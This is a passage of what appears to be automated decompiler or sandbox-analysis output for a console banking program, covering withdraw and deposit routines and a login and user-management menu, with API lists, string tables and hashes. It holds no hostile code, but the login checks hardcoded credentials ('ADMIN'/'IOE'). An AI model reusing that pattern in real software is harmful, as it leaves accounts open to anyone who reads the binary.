                                                                      				}
                                                                      				return _t97;
                                                                      			}


















































                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e9
                                                                      0x00be49f0
                                                                      0x00be49f9
                                                                      0x00be49fe
                                                                      0x00be4a03
                                                                      0x00be4a14
                                                                      0x00be4a26
                                                                      0x00be4a2b
                                                                      0x00be4a2e
                                                                      0x00be4a33
                                                                      0x00be4a37
                                                                      0x00be4a39
                                                                      0x00be4a42
                                                                      0x00be4a47
                                                                      0x00000000
                                                                      0x00be4a51
                                                                      0x00be4a5d
                                                                      0x00be4a68
                                                                      0x00be4a69
                                                                      0x00be4a6e
                                                                      0x00be4a7a
                                                                      0x00be4a7f
                                                                      0x00be4a84
                                                                      0x00be4a95
                                                                      0x00be4aa7
                                                                      0x00be4aac
                                                                      0x00be4aaf
                                                                      0x00be4ab4
                                                                      0x00be4abb
                                                                      0x00be4abe
                                                                      0x00be4ac2
                                                                      0x00be4ac6
                                                                      0x00be4aca
                                                                      0x00be4ad1
                                                                      0x00be4ad5
                                                                      0x00be4ad9
                                                                      0x00be4add
                                                                      0x00be4ae1
                                                                      0x00be4ae8
                                                                      0x00be4aef
                                                                      0x00be4afc
                                                                      0x00be4b02
                                                                      0x00be4b07
                                                                      0x00be4b0a
                                                                      0x00be4b0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4b1a
                                                                      0x00be4b1f
                                                                      0x00be4b22
                                                                      0x00be4b24
                                                                      0x00be4b26
                                                                      0x00be4b2b
                                                                      0x00be4b2f
                                                                      0x00be4b31
                                                                      0x00be4b3a
                                                                      0x00be4b3f
                                                                      0x00be4b47
                                                                      0x00be4b4c
                                                                      0x00be4b51
                                                                      0x00be4b5d
                                                                      0x00be4b62
                                                                      0x00be4b67
                                                                      0x00be4b6f
                                                                      0x00000000
                                                                      0x00be4b6f
                                                                      0x00be4b2f
                                                                      0x00be4b7b
                                                                      0x00be4b80
                                                                      0x00be4b85
                                                                      0x00be4b86
                                                                      0x00be4b8e
                                                                      0x00be4b97
                                                                      0x00be4b9c
                                                                      0x00be4ba1
                                                                      0x00be4ba6
                                                                      0x00be4bab
                                                                      0x00be4bb7
                                                                      0x00be4bc0
                                                                      0x00be4bcb
                                                                      0x00be4bcf
                                                                      0x00be4bdc
                                                                      0x00be4beb
                                                                      0x00be4bf3
                                                                      0x00be4bf8
                                                                      0x00be4c0b
                                                                      0x00be4c1f
                                                                      0x00be4c42
                                                                      0x00be4c4d
                                                                      0x00be4c4e
                                                                      0x00be4c5a
                                                                      0x00be4c5f
                                                                      0x00be4c64
                                                                      0x00be4c69
                                                                      0x00be4c6c
                                                                      0x00be4c70
                                                                      0x00be4c73
                                                                      0x00be4c82
                                                                      0x00be4c94
                                                                      0x00be4ca3
                                                                      0x00be4ca8
                                                                      0x00be4cab
                                                                      0x00be4cb0
                                                                      0x00be4cb7
                                                                      0x00be4cba
                                                                      0x00be4cbe
                                                                      0x00be4cc2
                                                                      0x00be4cc6
                                                                      0x00be4ccd
                                                                      0x00be4cd1
                                                                      0x00be4cd5
                                                                      0x00be4cd9
                                                                      0x00be4cdd
                                                                      0x00be4ce4
                                                                      0x00be4ceb
                                                                      0x00be4cf8
                                                                      0x00be4cff
                                                                      0x00be4d04
                                                                      0x00be4d07
                                                                      0x00be4d0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4d1b
                                                                      0x00be4d20
                                                                      0x00be4d23
                                                                      0x00be4d25
                                                                      0x00be4d27
                                                                      0x00be4d2c
                                                                      0x00be4d31
                                                                      0x00be4d31
                                                                      0x00be4d36
                                                                      0x00be4d3e
                                                                      0x00be4d42
                                                                      0x00be4d44
                                                                      0x00be4d49
                                                                      0x00be4d4e
                                                                      0x00be4d53
                                                                      0x00be4d5b
                                                                      0x00be4d5b
                                                                      0x00be4d60
                                                                      0x00be4d65
                                                                      0x00be4d6a
                                                                      0x00be4d6f
                                                                      0x00be4d77
                                                                      0x00be4d7c
                                                                      0x00be4d84
                                                                      0x00be4d89
                                                                      0x00be4d91
                                                                      0x00be4d9a
                                                                      0x00be4da1
                                                                      0x00be4da6
                                                                      0x00be4daa
                                                                      0x00be4dae
                                                                      0x00be4db2
                                                                      0x00be4db9
                                                                      0x00be4dc0
                                                                      0x00be4dc7
                                                                      0x00be4dc8
                                                                      0x00be4dcd
                                                                      0x00be4dd3
                                                                      0x00be4dd4
                                                                      0x00be4dd9
                                                                      0x00be4dd9
                                                                      0x00be4de1
                                                                      0x00be4de6
                                                                      0x00be4de7
                                                                      0x00be4def
                                                                      0x00be4df5
                                                                      0x00be4df6
                                                                      0x00be4e10
                                                                      0x00be4e1a
                                                                      0x00be4e22
                                                                      0x00be4e27
                                                                      0x00be4e2f
                                                                      0x00be4e34
                                                                      0x00be4e39
                                                                      0x00be4e3e
                                                                      0x00be4e46
                                                                      0x00be4e47
                                                                      0x00be4e4c
                                                                      0x00be4e51
                                                                      0x00be4e52
                                                                      0x00be4e5a
                                                                      0x00be4e60
                                                                      0x00be4e61
                                                                      0x00be4e69
                                                                      0x00be4e72
                                                                      0x00be4e77
                                                                      0x00000000
                                                                      0x00be4e81
                                                                      0x00be4c79
                                                                      0x00be4c7c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4e87

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE4A03
                                                                      • _wscanf.LIBCMT ref: 00BE4A14
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _wprintf.LIBCMT ref: 00BE4A4C
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE4A6E
                                                                      • _wprintf.LIBCMT ref: 00BE4A84
                                                                      • _wscanf.LIBCMT ref: 00BE4A95
                                                                      • _swscanf.LIBCMT ref: 00BE4B02
                                                                      • _wprintf.LIBCMT ref: 00BE4B51
                                                                      • _wprintf.LIBCMT ref: 00BE4B67
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2152
                                                                      Strings
                                                                      • Amount to be Withdrawn (in NRs.) : , xrefs: 00BE4A7F
                                                                      • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00BE4DC8
                                                                      • ACCOUNT.DAT, xrefs: 00BE4C87
                                                                      • Given A/C number does not exits!, xrefs: 00BE4A47
                                                                      • TRANSACTION.DAT, xrefs: 00BE4E03
                                                                      • Withdraw from A/C number : , xrefs: 00BE49FE
                                                                      • ACCOUNT.DAT, xrefs: 00BE4A21
                                                                      • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00BE4C5F
                                                                      • Sorry, the current balance is Rs. %.2f only!, xrefs: 00BE4B4C
                                                                      • %s %s %s %s %.2f %s, xrefs: 00BE4E47
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE4CF3
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE4AF7
                                                                      • Confirm Transaction, xrefs: 00BE4B9C
                                                                      • Transaction completed successfully!, xrefs: 00BE4E77
                                                                      • Transaction NOT completed!, xrefs: 00BE4B62
                                                                      • TEMP.DAT, xrefs: 00BE4C9E
                                                                      • [ %s ], xrefs: 00BE4A69
                                                                      • %s to be Withdrawn from A/C number : %s [%s], xrefs: 00BE4BD7
                                                                      • Cash+Withdrawn, xrefs: 00BE4E3E
                                                                      • ACCOUNT.DAT, xrefs: 00BE4AA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                                                      • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                                                      • API String ID: 427838879-2716176803
                                                                      • Opcode ID: 4d8ed0615d20e608632376254451aa415a02a85a1caf3972b8c9ecf6d9b11c5b
                                                                      • Instruction ID: 2084bcd04edfe494d24f824800270328d307ae5dae18a4602a10f54ed1346dc2
                                                                      • Opcode Fuzzy Hash: 4d8ed0615d20e608632376254451aa415a02a85a1caf3972b8c9ecf6d9b11c5b
                                                                      • Instruction Fuzzy Hash: C5C1C3B2D402496ADB11EBE5CC42FDEB3B8AF59700F1486A9F605760C1FB716648CF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00BE22F0(void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				char _v6;
                                                                      				signed int _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v60;
                                                                      				char _v92;
                                                                      				void* __ebp;
                                                                      				void* _t50;
                                                                      				void* _t74;
                                                                      				void* _t78;
                                                                      				void* _t85;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      				void* _t96;
                                                                      				void* _t100;
                                                                      				void* _t101;
                                                                      				void* _t106;
                                                                      				void* _t116;
                                                                      
                                                                      				_t116 = __fp0;
                                                                      				_t95 = __esi;
                                                                      				_t94 = __edi;
                                                                      				_v60 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v20 = 0;
                                                                      				_v16 = 0;
                                                                      				do {
                                                                      					_v20 = 0;
                                                                      					E00BE12B0(7, 5);
                                                                      					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                                      					E00BE715C(_t85, _t94, _t95, 0);
                                                                      					E00BE1380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
                                                                      					E00BE12B0(0x17, 0xa);
                                                                      					_push("Enter User name : ");
                                                                      					E00BE715C(_t85, _t94, _t95, 0);
                                                                      					E00BE738B("%s",  &_v92);
                                                                      					E00BE12B0(0x17, 0xc);
                                                                      					_push("Password        : ");
                                                                      					E00BE715C(_t85, _t94, _t95, 0);
                                                                      					_t100 = _t96 + 0x14;
                                                                      					E00BE12F0(_t94, _t95,  &_v60);
                                                                      					_v16 = _v16 + 1;
                                                                      					_t110 = _v16 - 3;
                                                                      					if(_v16 == 3) {
                                                                      						E00BE20E0( &_v92, _t94, _t95, _t110, _t116);
                                                                      						E00BE12B0(0x19, 8);
                                                                      						_push(0xbff224);
                                                                      						E00BE715C(_t85, _t94, _t95, _t110);
                                                                      						E00BE12B0(0x16, 0xb);
                                                                      						_push("Press any key to exit the program...");
                                                                      						E00BE715C(_t85, _t94, _t95, _t110);
                                                                      						_t100 = _t100 + 8;
                                                                      						E00BE77B1(0);
                                                                      					}
                                                                      					_t87 =  &_v92;
                                                                      					_t50 = E00BE8230( &_v92, "ADMIN");
                                                                      					_t101 = _t100 + 8;
                                                                      					if(_t50 != 0) {
                                                                      						L6:
                                                                      						E00BE20E0(_t87, _t94, _t95, __eflags, _t116);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push(0xbff278);
                                                                      						E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      						_t96 = _t101 + 4;
                                                                      					} else {
                                                                      						_t78 = E00BE8230( &_v60, "IOE");
                                                                      						_t101 = _t101 + 8;
                                                                      						if(_t78 != 0) {
                                                                      							goto L6;
                                                                      						} else {
                                                                      							_v20 = 1;
                                                                      						}
                                                                      					}
                                                                      					_t113 = _v20 - 1;
                                                                      				} while (_v20 != 1);
                                                                      				do {
                                                                      					E00BE20E0(_t87, _t94, _t95, _t113, _t116);
                                                                      					E00BE12B0(0x1e, 8);
                                                                      					_push("1. Add User");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0xa);
                                                                      					_push("2. Delete User");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0xc);
                                                                      					_push("3. Edit User name / Password");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0xe);
                                                                      					_push("4. View User Log");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					E00BE12B0(0x1e, 0x10);
                                                                      					_push("5. Exit");
                                                                      					E00BE715C(_t85, _t94, _t95, _t113);
                                                                      					_t106 = _t96 + 0x14;
                                                                      					E00BE12B0(1, 0x11);
                                                                      					_v24 = 0;
                                                                      					while(1) {
                                                                      						_t114 = _v24 - 0x4e;
                                                                      						if(_v24 >= 0x4e) {
                                                                      							break;
                                                                      						}
                                                                      						_push("_");
                                                                      						E00BE715C(_t85, _t94, _t95, _t114);
                                                                      						_t106 = _t106 + 4;
                                                                      						_v24 = _v24 + 1;
                                                                      					}
                                                                      					E00BE12B0(0x17, 0x13);
                                                                      					_push(" Press a number between the range [1 -5]  ");
                                                                      					E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      					_t96 = _t106 + 4;
                                                                      					_t89 = _v6 - 0x30;
                                                                      					_v28 = _v6 - 0x30;
                                                                      					_v12 = _v28;
                                                                      					_v12 = _v12 - 1;
                                                                      					__eflags = _v12 - 4;
                                                                      					if(__eflags > 0) {
                                                                      						E00BE20E0(_t89, _t94, _t95, __eflags, _t116);
                                                                      						E00BE12B0(0xa, 0xa);
                                                                      						_push("Your input is out of range! Enter a choice between 1 to 5!");
                                                                      						E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      						E00BE12B0(0xf, 0xc);
                                                                      						_push("Press ENTER to return to main menu...");
                                                                      						_t74 = E00BE715C(_t85, _t94, _t95, __eflags);
                                                                      						_t96 = _t96 + 8;
                                                                      					} else {
                                                                      						switch( *((intOrPtr*)(_v12 * 4 +  &M00BE25A8))) {
                                                                      							case 0:
                                                                      								_t74 = E00BE25C0(_t85, _t94, _t95, _t116);
                                                                      								goto L23;
                                                                      							case 1:
                                                                      								E00BE2800(__ebx, __ecx, __edi, __esi, __fp0);
                                                                      								goto L23;
                                                                      							case 2:
                                                                      								E00BE2B10(__ebx, __edi, __esi, __fp0);
                                                                      								goto L23;
                                                                      							case 3:
                                                                      								E00BE2E80(__ebx, __edx, __eflags, __fp0);
                                                                      								goto L23;
                                                                      							case 4:
                                                                      								E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                                      								E00BE12B0(0xf, 0xa);
                                                                      								_push("Are you sure you want to exit? <Y/N> : ");
                                                                      								E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      								__esp = __esp + 4;
                                                                      								__edx = _v5;
                                                                      								__eflags = _v5 - 0x59;
                                                                      								if(_v5 == 0x59) {
                                                                      									L20:
                                                                      									E00BE77B1(0);
                                                                      								} else {
                                                                      									__eflags = _v5 - 0x79;
                                                                      									if(_v5 == 0x79) {
                                                                      										goto L20;
                                                                      									}
                                                                      								}
                                                                      								goto L23;
                                                                      						}
                                                                      					}
                                                                      					L23:
                                                                      					_t87 = 1;
                                                                      					__eflags = 1;
                                                                      				} while (1 != 0);
                                                                      				return _t74;
                                                                      			}
































                                                                      0x00be22f0
                                                                      0x00be22f0
                                                                      0x00be22f0
                                                                      0x00be22f6
                                                                      0x00be22fc
                                                                      0x00be22ff
                                                                      0x00be2302
                                                                      0x00be2305
                                                                      0x00be2308
                                                                      0x00be230b
                                                                      0x00be230e
                                                                      0x00be2311
                                                                      0x00be2314
                                                                      0x00be231b
                                                                      0x00be2322
                                                                      0x00be2322
                                                                      0x00be232d
                                                                      0x00be2332
                                                                      0x00be2337
                                                                      0x00be2347
                                                                      0x00be2350
                                                                      0x00be2355
                                                                      0x00be235a
                                                                      0x00be236b
                                                                      0x00be2377
                                                                      0x00be237c
                                                                      0x00be2381
                                                                      0x00be2386
                                                                      0x00be238d
                                                                      0x00be2398
                                                                      0x00be239b
                                                                      0x00be239f
                                                                      0x00be23a1
                                                                      0x00be23aa
                                                                      0x00be23af
                                                                      0x00be23b4
                                                                      0x00be23c0
                                                                      0x00be23c5
                                                                      0x00be23ca
                                                                      0x00be23cf
                                                                      0x00be23d4
                                                                      0x00be23d4
                                                                      0x00be23de
                                                                      0x00be23e2
                                                                      0x00be23e7
                                                                      0x00be23ec
                                                                      0x00be240c
                                                                      0x00be240c
                                                                      0x00be2415
                                                                      0x00be241a
                                                                      0x00be241f
                                                                      0x00be2424
                                                                      0x00be23ee
                                                                      0x00be23f7
                                                                      0x00be23fc
                                                                      0x00be2401
                                                                      0x00000000
                                                                      0x00be2403
                                                                      0x00be2403
                                                                      0x00be2403
                                                                      0x00be2401
                                                                      0x00be2427
                                                                      0x00be2427
                                                                      0x00be2431
                                                                      0x00be2431
                                                                      0x00be243a
                                                                      0x00be243f
                                                                      0x00be2444
                                                                      0x00be2450
                                                                      0x00be2455
                                                                      0x00be245a
                                                                      0x00be2466
                                                                      0x00be246b
                                                                      0x00be2470
                                                                      0x00be247c
                                                                      0x00be2481
                                                                      0x00be2486
                                                                      0x00be2492
                                                                      0x00be2497
                                                                      0x00be249c
                                                                      0x00be24a1
                                                                      0x00be24a8
                                                                      0x00be24ad
                                                                      0x00be24bf
                                                                      0x00be24bf
                                                                      0x00be24c3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be24c5
                                                                      0x00be24ca
                                                                      0x00be24cf
                                                                      0x00be24bc
                                                                      0x00be24bc
                                                                      0x00be24d8
                                                                      0x00be24dd
                                                                      0x00be24e2
                                                                      0x00be24e7
                                                                      0x00be24ee
                                                                      0x00be24f1
                                                                      0x00be24f7
                                                                      0x00be2500
                                                                      0x00be2503
                                                                      0x00be2507
                                                                      0x00be2565
                                                                      0x00be256e
                                                                      0x00be2573
                                                                      0x00be2578
                                                                      0x00be2584
                                                                      0x00be2589
                                                                      0x00be258e
                                                                      0x00be2593
                                                                      0x00be2509
                                                                      0x00be250c
                                                                      0x00000000
                                                                      0x00be2513
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be251a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2521
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2528
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be252f
                                                                      0x00be2538
                                                                      0x00be253d
                                                                      0x00be2542
                                                                      0x00be2547
                                                                      0x00be254a
                                                                      0x00be254e
                                                                      0x00be2551
                                                                      0x00be255c
                                                                      0x00be255e
                                                                      0x00be2553
                                                                      0x00be2557
                                                                      0x00be255a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be255a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be250c
                                                                      0x00be2596
                                                                      0x00be2596
                                                                      0x00be259b
                                                                      0x00be259b
                                                                      0x00be25a6

                                                                      APIs
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE2337
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                      • _wprintf.LIBCMT ref: 00BE235A
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wscanf.LIBCMT ref: 00BE236B
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE2381
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                      • _wprintf.LIBCMT ref: 00BE23B4
                                                                      • _wprintf.LIBCMT ref: 00BE241F
                                                                        • Part of subcall function 00BE25C0: _wprintf.LIBCMT ref: 00BE262D
                                                                        • Part of subcall function 00BE25C0: _wscanf.LIBCMT ref: 00BE263F
                                                                        • Part of subcall function 00BE25C0: _swscanf.LIBCMT ref: 00BE2681
                                                                        • Part of subcall function 00BE25C0: _wprintf.LIBCMT ref: 00BE26D1
                                                                      • _wprintf.LIBCMT ref: 00BE23CA
                                                                        • Part of subcall function 00BE77B1: _doexit.LIBCMT ref: 00BE77BB
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2152
                                                                      • _wprintf.LIBCMT ref: 00BE2444
                                                                      • _wprintf.LIBCMT ref: 00BE245A
                                                                      • _wprintf.LIBCMT ref: 00BE2470
                                                                      • _wprintf.LIBCMT ref: 00BE2486
                                                                      • _wprintf.LIBCMT ref: 00BE249C
                                                                      • _wprintf.LIBCMT ref: 00BE24CA
                                                                      • _wprintf.LIBCMT ref: 00BE24E2
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                      Strings
                                                                      • 2. Delete User, xrefs: 00BE2455
                                                                      • 5. Exit, xrefs: 00BE2497
                                                                      • Press a number between the range [1 -5] , xrefs: 00BE24DD
                                                                      • IOE, xrefs: 00BE23EE
                                                                      • Are you sure you want to exit? <Y/N> : , xrefs: 00BE253D
                                                                      • ADMIN, xrefs: 00BE23D9
                                                                      • N, xrefs: 00BE24BF
                                                                      • Press any key to exit the program..., xrefs: 00BE23C5
                                                                      • Only THREE attempts shall be allowed to enter username and password., xrefs: 00BE2332
                                                                      • Password : , xrefs: 00BE237C
                                                                      • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 00BE2573
                                                                      • Enter User name : , xrefs: 00BE2355
                                                                      • 3. Edit User name / Password, xrefs: 00BE246B
                                                                      • 1. Add User, xrefs: 00BE243F
                                                                      • 4. View User Log, xrefs: 00BE2481
                                                                      • Press ENTER to return to main menu..., xrefs: 00BE2589
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                                      • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                                                      • API String ID: 3691436685-2046970424
                                                                      • Opcode ID: 5dff1de0fcbf1a666caf568cb5b30ef62a405c74247c7e6b98ca8d6a81278d43
                                                                      • Instruction ID: 356120723aa1a966aa06d3f98d7da73afc5232578c1830f18e55f5bee581c0d6
                                                                      • Opcode Fuzzy Hash: 5dff1de0fcbf1a666caf568cb5b30ef62a405c74247c7e6b98ca8d6a81278d43
                                                                      • Instruction Fuzzy Hash: 636165B1E9438AA5EB20BBA68C43BAD76F45F11B00F1045E4F705792C2DBB15148876B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E00BE4640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				char _v5;
                                                                      				char _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v40;
                                                                      				char _v42;
                                                                      				char _v62;
                                                                      				char _v112;
                                                                      				char _v113;
                                                                      				char _v125;
                                                                      				char _v140;
                                                                      				char _v170;
                                                                      				char _v200;
                                                                      				char _v208;
                                                                      				char _v244;
                                                                      				char _v280;
                                                                      				char _v360;
                                                                      				char _v440;
                                                                      				void* __ebp;
                                                                      				void* _t57;
                                                                      				char _t73;
                                                                      				intOrPtr _t75;
                                                                      				void* _t80;
                                                                      				intOrPtr _t81;
                                                                      				intOrPtr _t86;
                                                                      				void* _t93;
                                                                      				intOrPtr _t103;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t114;
                                                                      				intOrPtr _t129;
                                                                      				intOrPtr _t134;
                                                                      				void* _t137;
                                                                      				void* _t141;
                                                                      				void* _t151;
                                                                      				void* _t153;
                                                                      				void* _t154;
                                                                      				void* _t163;
                                                                      
                                                                      				_t170 = __fp0;
                                                                      				_t168 = __eflags;
                                                                      				_t136 = __esi;
                                                                      				_t135 = __edi;
                                                                      				_t101 = __ebx;
                                                                      				_v16 = 0;
                                                                      				E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                                      				E00BE12B0(5, 0xa);
                                                                      				_push("Deposit to A/C number            : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      				E00BE738B("%s",  &_v28);
                                                                      				 *0xc02f28 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      				_t103 =  *0xc02f28; // 0x0
                                                                      				_push(_t103);
                                                                      				E00BE6DB6(__ebx, _t135, _t136, _t168);
                                                                      				_t141 = _t137 + 0x18;
                                                                      				_t169 = _v16;
                                                                      				if(_v16 == 0) {
                                                                      					E00BE20E0(_t103, _t135, _t136, _t169, __fp0);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Given A/C number does not exits!");
                                                                      					return E00BE715C(_t101, _t135, _t136, _t169);
                                                                      				}
                                                                      				E00BE12B0(0x32, 0xa);
                                                                      				_push( &_v244);
                                                                      				_push("[ %s ]");
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				E00BE12B0(5, 0xc);
                                                                      				_push("Amount to be Deposited (in NRs.) : ");
                                                                      				E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				E00BE738B("%f",  &_v12);
                                                                      				E00BE20E0(_t103, _t135, _t136, __eflags, __fp0);
                                                                      				E00BE12B0(0x1e, 0xa);
